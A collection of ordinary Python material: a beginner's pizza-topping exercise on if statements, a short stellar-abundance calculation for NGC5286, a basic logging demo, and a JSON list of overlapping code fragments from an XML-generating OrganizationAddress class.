<filename>Python/python-practice/chapter5-if/toppints.py
requested_topping = 'mushrooms'
if requested_topping != 'anchovies':
    print("Hold the anchovies!")

answer = 17
if answer != 42:
    print("That is not the correct answer. Please try again!")

requested_toppings = ['mushrooms', 'extra cheese']
if 'mushrooms' in requested_toppings:
    print("Adding mushrooms.")
if 'pepperoni' in requested_toppings:
    print("Adding pepperoni.")
if 'extra cheese' in requested_toppings:
    print("Adding extra cheese.")
print("\nFinished making your pizza!")

requested_toppings = ['mushrooms', 'green peppers', 'extra cheese']
for requested_topping in requested_toppings:
    if requested_topping == 'green peppers':
        print("Sorry, we are out of green peppers right now.")
    else:
        print("Adding " + requested_topping + ".")
print("\nFinished making your pizza!")

requested_toppings = []
if requested_toppings:
    for requested_topping in requested_toppings:
        print("Adding " + requested_topping + ".")
    print("\nFinished making your pizza!")
else:
    print("Are you sure you want a pizza?")

available_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni',
                      'pineapple', 'extra cheese']
requested_toppings = ['mushrooms', 'french fries', 'extra cheese']
for requested_topping in requested_toppings:
    if requested_topping in available_toppings:
        print("Adding " + requested_topping + ".")
    else:
        print("Sorry, we don't have " + requested_topping + ".")
print("\nFinished making your pizza!")
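
# For reference (not in the original file): with the two lists above, the
# final availability check accepts 'mushrooms' and 'extra cheese' and
# rejects 'french fries', so it prints:
#     Adding mushrooms.
#     Sorry, we don't have french fries.
#     Adding extra cheese.
#
#     Finished making your pizza!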
from abundsolar import elsolarlogepsilon

zfactor = 10 ** -1.92
# mean of s-poor population in NGC5286
# from Marino et al. (2015) 2015MNRAS.450..815M
# [Fe/H] = -1.92
# log X/Fe = [X/Fe] + log(X/Fe)_solar
targetlogxtofe = {
    'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'],
    'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'],
    'y': -0.04 + elsolarlogepsilon['y'] - elsolarlogepsilon['fe'],
    'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'],
    'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'],
    'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'],
    'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'],
    'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'],
    'nd': 0.20 + elsolarlogepsilon['nd'] - elsolarlogepsilon['fe']
}
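
# Usage sketch (not in the original file): per the comment above, each entry
# of targetlogxtofe is log10 of the target's X/Fe number ratio, so the linear
# ratios follow directly:
targetxtofe = {el: 10 ** logratio for el, logratio in targetlogxtofe.items()}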
<filename>log/basic_log.py
import time

# print("===start: not use logging===")
# # Set the log level
# MODE = "INFO"
# for i in range(5):  # simulate a loop of repeated work
#     # simulate some work and its running time
#     a = i
#     b = i * 2
#     c = a + b
#     time.sleep(1)
#
#     if MODE == "DEBUG" or MODE == "INFO":
#         print("a:{}, b:{}".format(a,b))
#     if MODE == "INFO":
#         print("c:{}".format(c))

print("===start: use logging===")
import logging

# Set the log level
logging.basicConfig(
    level=logging.DEBUG,
    filename="log/basic_log.log"  # This kwarg is not necessary when displaying information on the screen
)
for i in range(5):  # simulate a loop of repeated work
    # simulate some work and its running time
    a = i
    b = i * 2
    c = a + b
    time.sleep(1)
    # DEBUG-level message
    logging.debug("a:{}, b:{}".format(a,b))
    # INFO-level message
    logging.info("c:{}".format(c))
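
# Aside (not in the original file): logging also accepts lazy %-style
# arguments, deferring string formatting until the record is actually
# emitted, so messages below the configured level cost almost nothing:
logging.debug("a:%s, b:%s", a, b)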
[
"None if val is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return",
"LocalityName) -> None: self.__localityName = None if val is None else LocalityName(val) @property",
"else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val:",
"localityName: LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode = None, countryCode:",
"val: LocalityName) -> None: self.__localityName = None if val is None else LocalityName(val)",
"self.__addressText = None if val is None else AddressText(val) @property def supplementalAddressText(self) ->",
"# Assign attributes from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText =",
"def stateCode(self, val: StateCode) -> None: self.__stateCode = None if val is None",
"__countyCode: CountyCode def __init__( self, o: dict = None, *, addressTypeName: AddressTypeName =",
"# Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText",
"is None else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def",
"@property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) ->",
"StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode",
"doc.line tag = doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName)",
"self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName)",
"None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self,",
"line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not",
"typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\")",
"LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o:",
"if val is None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") ->",
"self.__addressTypeName = None if val is None else AddressTypeName(val) @property def addressText(self) ->",
"without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName =",
"= None, postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode =",
"PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode)",
"line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not",
"AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText = None",
"@countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode = None if val is",
"def countryCode(self, val: CountryCode) -> None: self.__countryCode = None if val is None",
"line = doc.line tag = doc.tag with tag(name): if self.__addressTypeName is not None:",
"def __init__( self, o: dict = None, *, addressTypeName: AddressTypeName = None, addressText:",
"if val is None else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode",
"LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of an",
"-> None: self.__countryCode = None if val is None else CountryCode(val) @property def",
"not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText",
"else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc = Doc()",
"if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\",",
"CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode = None",
"= None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode =",
"from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText",
"val: CountryCode) -> None: self.__countryCode = None if val is None else CountryCode(val)",
"( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\"",
"self.__postalCode = None if val is None else PostalCode(val) @property def countryCode(self) ->",
"Doc from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText,",
"localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName",
"doc = Doc() line = doc.line tag = doc.tag with tag(name): if self.__addressTypeName",
"LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode)",
"= o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary with typechecking self.addressTypeName",
"StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict =",
"o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode",
"self.__localityName = None if val is None else LocalityName(val) @property def stateCode(self) ->",
"-> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName =",
"= supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode =",
"not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode",
"= Doc() line = doc.line tag = doc.tag with tag(name): if self.__addressTypeName is",
"keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName",
"addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName",
"else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val:",
"SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__(",
"addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText",
"self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None:",
"not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode",
"o: dict = None, *, addressTypeName: AddressTypeName = None, addressText: AddressText = None,",
"-> None: self.__postalCode = None if val is None else PostalCode(val) @property def",
"self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode",
"@stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode = None if val is",
"@property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) ->",
"val: StateCode) -> None: self.__stateCode = None if val is None else StateCode(val)",
"physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName:",
"__countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict = None, *, addressTypeName:",
"not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode",
"= ( None if val is None else SupplementalAddressText(val) ) @property def localityName(self)",
"AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode",
"= o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o,",
"= o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode =",
"= o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode =",
"self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode)",
"self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode)",
"PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of an organization.",
"countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def",
"is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def",
"doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is",
"stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self)",
"is None else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def",
"None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is",
"def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if val is None",
"StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of an organization. \"\"\"",
"= o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode =",
"self.__stateCode = None if val is None else StateCode(val) @property def postalCode(self) ->",
"None else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self,",
"if val is None else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode",
"o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\")",
"line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not",
"from yattag import Doc from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName,",
"-> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode =",
"line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not",
"self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText)",
"return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode = None if",
"self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self) ->",
"SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val is None else SupplementalAddressText(val)",
"addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode",
"isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText",
"= doc.line tag = doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\",",
"import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress:",
"@localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName = None if val is",
"= None, stateCode: StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode =",
"not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None: line(\"CountyCode\", self.__countyCode) return doc.getvalue()",
"attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText =",
"= addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode =",
"if isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName",
"self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif",
"val is None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName",
"@property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) ->",
"an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode",
"CountyCode) -> None: self.__countyCode = None if val is None else CountyCode(val) def",
"None: self.__addressText = None if val is None else AddressText(val) @property def supplementalAddressText(self)",
"= postalCode self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName:",
"= None if val is None else CountryCode(val) @property def countyCode(self) -> CountyCode:",
"countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign attributes from object",
"= addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode =",
"if val is None else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode",
"self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode = None if val",
"-> None: self.__localityName = None if val is None else LocalityName(val) @property def",
"= o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode =",
"attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText =",
"addressText(self, val: AddressText) -> None: self.__addressText = None if val is None else",
"self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode",
"None ): if isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName",
"None: self.__stateCode = None if val is None else StateCode(val) @property def postalCode(self)",
"PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode = None",
"AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None",
"return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName = None if",
"def countyCode(self, val: CountyCode) -> None: self.__countyCode = None if val is None",
"val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val is None else",
"self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None:",
"o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named keywords with typechecking",
"( None if val is None else SupplementalAddressText(val) ) @property def localityName(self) ->",
"else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val:",
"o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\")",
"val is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter",
"is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if",
"StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode = None",
"is None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc",
"= None, localityName: LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode =",
"if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\",",
"self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode",
"postalCode self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return",
"AddressTypeName) -> None: self.__addressTypeName = None if val is None else AddressTypeName(val) @property",
"*, addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None,",
"o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign",
"AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName",
"@property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) ->",
"o.get(\"countyCode\") else: # Assign attributes from named keywords with typechecking self.addressTypeName = addressTypeName",
"addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode",
"self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText)",
"AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText)",
"addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName:",
"def addressText(self, val: AddressText) -> None: self.__addressText = None if val is None",
"def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None:",
"None: self.__addressTypeName = None if val is None else AddressTypeName(val) @property def addressText(self)",
"= o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary",
"__addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode:",
"return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode = None if",
"self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary with typechecking",
"= None, *, addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText",
"AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The",
"from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, )",
"OrganizationAddress: \"\"\" The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText",
"StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode)",
"self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode",
"self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName = None if val",
"None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None,",
"# Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\")",
"self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode",
"None else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self,",
"val is None else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter",
"attributes from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText",
"name: str = \"OrganizationAddress\") -> str: doc = Doc() line = doc.line tag",
"= o.get(\"countyCode\") else: # Assign attributes from named keywords with typechecking self.addressTypeName =",
"None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def",
"self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None: line(\"CountyCode\", self.__countyCode)",
"self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None:",
") @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName)",
"tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None:",
"str = \"OrganizationAddress\") -> str: doc = Doc() line = doc.line tag =",
"= countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter",
"CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode = None",
"= None, countryCode: CountryCode = None, countyCode: CountyCode = None ): if isinstance(o,",
"o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode",
"LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode",
"-> None: self.__stateCode = None if val is None else StateCode(val) @property def",
"None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is",
"supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode = None, postalCode:",
"return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode = None if",
"is None else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def",
"if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\",",
"self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode",
"generateXML(self, name: str = \"OrganizationAddress\") -> str: doc = Doc() line = doc.line",
"= o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from",
"SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val:",
"self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode = None if val",
"PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode = None ): if",
"else: # Assign attributes from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText",
"stateCode: StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode:",
"CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign attributes from object without",
"@property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) ->",
"addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode:",
"return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None",
"None, stateCode: StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode = None,",
"self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else:",
"self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None:",
"None if val is None else LocalityName(val) @property def stateCode(self) -> StateCode: return",
"self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes",
"import Doc from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode,",
"None: self.__countyCode = None if val is None else CountyCode(val) def generateXML(self, name:",
"countyCode(self, val: CountyCode) -> None: self.__countyCode = None if val is None else",
"self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText = None if val",
"is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if",
"of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode:",
"self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode)",
"= None if val is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText:",
"address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName",
"tag = doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if",
"class OrganizationAddress: \"\"\" The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText:",
"str: doc = Doc() line = doc.line tag = doc.tag with tag(name): if",
"AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode",
"def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None:",
"-> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText =",
"None else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self,",
"The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText",
"None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc =",
"= None if val is None else AddressTypeName(val) @property def addressText(self) -> AddressText:",
"__init__( self, o: dict = None, *, addressTypeName: AddressTypeName = None, addressText: AddressText",
"Doc() line = doc.line tag = doc.tag with tag(name): if self.__addressTypeName is not",
"-> str: doc = Doc() line = doc.line tag = doc.tag with tag(name):",
"else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val:",
"None: self.__countryCode = None if val is None else CountryCode(val) @property def countyCode(self)",
"None, postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode = None",
"val: CountyCode) -> None: self.__countyCode = None if val is None else CountyCode(val)",
"CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address",
"= o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode =",
"addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if val is None else",
"= o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode =",
"supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val is None",
"val is None else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter",
"CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode)",
